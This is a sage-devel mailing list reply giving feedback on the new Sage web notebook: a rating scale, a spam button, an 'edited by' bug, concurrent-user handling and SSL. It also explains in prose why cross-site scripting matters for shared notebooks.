> > Some very minor issues, IMHO: > > * I assume 4.0 is the highest rating? As I start counting at zero I would > > like to rate a notebook with 0.0, i.e. claim it is useless. 1.0 is > > something, 0.0 is crap. > > I can add that. I was thinking of also adding a comment field, so you can > explain why said worksheet is crap.
Sounds good. > > * as far as I can tell, there is no prevention of cross-side-scripting > > attacks implemented yet. Is this a planed feature? > > No plans. Could you make some plans? > > This is only an issue when the notebook users are completely random > and open. I believe that in the long run most > notebook usage will be by users who are trusted and have specifically > been given accounts (e.g., students at a specific university in a course), > which is why getting SSL authentication and > encryption up and running by default was so important. If I could run arbitrary javascript on my teacher's computer that would still be a security breach, so even though the authentication/encryption helps a lot, it doesn't prevent this from happening/being a threat. > Anonymous free open notebooks will probably only be > run by some crazy folks (such as me!!) until they get in trouble with > their universities... It's just completely giving away nontrivial > computing resources. XSS attacks ( http://en.wikipedia.org/wiki/XSS ) are not about the server: The attack is to inject javascript code into a notebook cell and thus have another user's browser perform evil things like sending a cookie around/browsing some evil website etc.. So it doesn't really matter who runs the website as long as people trust the website to visit it. The only solution is to prevent HTML output under direct user control. This is one reason why Wikis come with their own markup languages. So for example all output gets filtered through a module which translates MoinMoin Wiki markup to HTML (like the MoinMoin wiki does) and filters out every other HTML. > > * Most websites which allow users to publish their stuff have a "report > > this as spam/offensive" button, this could be useful. > > That's a good idea. > > > * How come that 'was' edited my published notebook last according to > > https://sage.math.washington.edu:8102/home/pub/14/ . Is this was' admin > > status, a bug, a feature? > > Bug. It looks right here: > https://sage.math.washington.edu:8102/home/pub/ > I just need to make sure the "edited by" line is taken from the same place > (same function call) in both cases. > > > But again, overall it is just amazingly cool, > > Cool, I'm glad you appreciate it. It was very very hard work to write > last week. > > I will be working a lot on polishing and improving it in little ways this > week. One big problem is that the username is being set by the server as a > global variable (in a file twist.py) -- this was a hack to get things > going, and of course > is fine when testing as a single user. But this morning there were about > THIRTY high school students in my workshop pounding the server at once, and > this silly hack certainly didn't hold up under multiple concurrent requests > (!). Fixing that > is first on my list. > > Thanks for all your feedback. > > By the way, as always, everything anyone should need to switch to the old > notebook is in > http://sage.math.washington.edu/home/was/twisted/ > > Automigration of old worksheets is implemented, and might even work. > Right after migrating, you should delete the sage_notebook/worksheets > directory manually. You do migration just by running the new notebook; > it detects that the notebook is in the old format and updates everything. > The screen goes blank for a few seconds, but don't panic. \ > > I've set the server up so that even locally if you type "notebook()" to > run the notebook on localhost, then it uses SSL and you have to > type a password. I did this, since my assumption is that if I don't do > this, then anybody else who logs into your computer could hose your > account. Is this correct? Yes. As the local notebook listens on 127.0.0.1 it accepts connections from everyone able to connect to 127.0.0.1. Martin -- name: Martin Albrecht _pgp: http://pgp.mit.edu:11371/pks/lookup?op=get&search=0x8EF0DC99 _www: http://www.informatik.uni-bremen.de/~malb _jab: [EMAIL PROTECTED] --~--~---------~--~----~------------~-------~--~----~ To post to this group, send email to sage-devel@googlegroups.com To unsubscribe from this group, send email to [EMAIL PROTECTED] For more options, visit this group at http://groups.google.com/group/sage-devel URLs: http://sage.scipy.org/sage/ and http://modular.math.washington.edu/sage/ -~----------~----~----~----~------~----~------~--~---
